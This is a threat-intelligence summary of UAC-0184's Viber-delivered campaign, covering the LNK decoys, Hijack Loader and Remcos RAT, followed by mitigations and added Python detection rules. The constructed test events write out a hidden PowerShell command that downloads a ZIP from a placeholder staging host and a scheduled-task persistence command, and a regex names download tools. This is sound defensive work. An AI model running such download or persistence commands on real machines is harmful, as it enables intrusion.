Full Report
The Russia-aligned threat actor known as UAC-0184 has been observed targeting Ukrainian military and government entities by leveraging the Viber messaging platform to deliver malicious ZIP archives. "This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025," the 360 Threat Intelligence Center said in
Analysis Summary
# Threat Actor: UAC-0184
## Attribution & Identity
* **Identification:** UAC-0184 (also tracked as Hive0156).
* **Attribution:** Russia-aligned threat actor.
* **First Documented:** Early January 2024 by CERT-UA.
## Activity Summary
UAC-0184 has continued high-intensity intelligence gathering activities against Ukrainian military and government departments throughout 2025. The group has evolved its TTPs, moving from war-themed phishing emails to leveraging widely used messaging platforms for initial access.
## Tactics, Techniques & Procedures
* **Initial Access/Delivery:** Leveraging the **Viber messaging platform** to deliver malicious ZIP archives.
* **Deception:** ZIP archives contain multiple Windows shortcut (`.LNK`) files disguised as official Microsoft Word and Excel documents to serve as decoys and lower suspicion.
* **Execution Chain:** LNK files silently execute a PowerShell script to fetch a second ZIP archive (`smoothieks.zip`) from a remote server.
* **Malware Staging:** Reconstructs and deploys **Hijack Loader** in memory using multi-stage processes, including DLL side-loading and module stomping for defense evasion.
* **Defense Evasion:** Scans the environment for security software (e.g., Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, Microsoft) by calculating their CRC32 hashes.
* **Persistence:** Establishes persistence via **scheduled tasks**.
* **Final Payload Delivery:** Covertly executes **Remcos RAT** by injecting it into the process `chime.exe`.
## Targeting
* **Sectors:** Military and Government entities.
* **Geography:** Ukraine.
* **Victims:** Ukrainian military and government departments.
## Tools & Infrastructure
* **Malware Families Used:**
  * **Hijack Loader:** Used as the primary infection mechanism/loader.
  * **Remcos RAT:** Deployed as the final stage for remote control, monitoring, and data theft.
* **Infrastructure (C2):**
  * Remote server hosting the second-stage ZIP archive (`smoothieks.zip`). (No specific URLs/IPs provided in the extract.)
## Implications
UAC-0184 demonstrates continuous adaptation, shifting delivery mechanisms to popular communication apps (Viber, following past use of Signal and Telegram) to maintain high-intensity intelligence gathering against sensitive Ukrainian targets. The reliance on sophisticated in-memory execution (DLL side-loading, module stomping) and common RATs like Remcos indicates a persistent and capable espionage operation.
## Mitigations
* Implement strict endpoint security monitoring focused on behavioral anomalies, especially concerning PowerShell execution originating from communications applications.
* Harden systems against LNK file execution and ensure LNK files cannot execute scripts or fetch remote content.
* Implement robust process injection detection, particularly monitoring unexpected code execution within legitimate system processes (`chime.exe`).
* Review firewall and network policies to restrict command-and-control traffic associated with known malware families or unusual download patterns following messaging app interactions.
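As an added example, not from the report or the 360 Threat Intelligence Center, the Python below turns the mitigations above into a handful of triage rules over Sysmon-style process-creation and remote-thread events: PowerShell spawned by a messaging client, an Explorer-launched (clicked `.LNK`) PowerShell that fetches a ZIP, `schtasks /Create` from PowerShell, and a remote thread opened in `chime.exe`. The events, file paths and the staging URL are constructed placeholders, since the report names no infrastructure.

```python
# Added detection logic (not from the report): Sysmon-style events are
# constructed dicts; image paths, hosts and the URL are hypothetical.
import re

MESSAGING_APPS = {"viber.exe", "signal.exe", "telegram.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell download primitives followed by a .zip somewhere in the command line.
FETCH_RE = re.compile(r"(invoke-webrequest|iwr|downloadfile|downloadstring|curl|wget).*\.zip", re.I)

def base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_ps_from_messenger(ev):  # PowerShell spawned directly by a messaging client
    return (ev["event"] == "process_create" and base(ev["image"]) in POWERSHELL
            and base(ev["parent_image"]) in MESSAGING_APPS)

def rule_ps_fetches_zip(ev):  # Explorer (a clicked .LNK) launching PowerShell that pulls a ZIP
    return (ev["event"] == "process_create" and base(ev["image"]) in POWERSHELL
            and base(ev["parent_image"]) == "explorer.exe" and bool(FETCH_RE.search(ev["cmdline"])))

def rule_schtasks_from_ps(ev):  # scheduled-task persistence created by PowerShell
    return (ev["event"] == "process_create" and base(ev["image"]) == "schtasks.exe"
            and base(ev["parent_image"]) in POWERSHELL and "/create" in ev["cmdline"].lower())

def rule_inject_chime(ev):  # remote thread created in chime.exe by another process
    return (ev["event"] == "remote_thread" and base(ev["target_image"]) == "chime.exe"
            and base(ev["source_image"]) != "chime.exe")

RULES = [rule_ps_from_messenger, rule_ps_fetches_zip, rule_schtasks_from_ps, rule_inject_chime]

def triage(events):
    """Return (event index, rule name) for every event that trips a rule."""
    return [(i, r.__name__) for i, ev in enumerate(events) for r in RULES if r(ev)]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXP = r"C:\Windows\explorer.exe"
SAMPLE = [  # constructed telemetry; the placeholder URL stands in for the unnamed staging server
    {"event": "process_create", "image": EXP, "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"event": "process_create", "image": PS, "parent_image": EXP,
     "cmdline": "powershell -w hidden -c \"iwr hxxp://staging.example/smoothieks.zip -OutFile $env:TEMP\\s.zip\""},
    {"event": "process_create", "image": PS, "parent_image": EXP, "cmdline": "powershell Get-Date"},
    {"event": "process_create", "image": r"C:\Windows\System32\schtasks.exe", "parent_image": PS,
     "cmdline": "schtasks /Create /SC ONLOGON /TN Updater /TR C:\\Users\\Public\\app.exe"},
    {"event": "process_create", "image": PS, "parent_image": r"C:\Users\u\AppData\Local\Viber\Viber.exe",
     "cmdline": "powershell -w hidden -File C:\\Users\\Public\\run.ps1"},
    {"event": "remote_thread", "source_image": r"C:\Users\Public\app.exe", "target_image": r"C:\Windows\Temp\chime.exe"},
]

if __name__ == "__main__":
    for idx, name in triage(SAMPLE):
        print(f"event {idx}: {name}")
```

The benign `Get-Date` launch from Explorer is included to show that the ZIP-fetch rule keys on the download primitive plus archive name rather than on PowerShell alone.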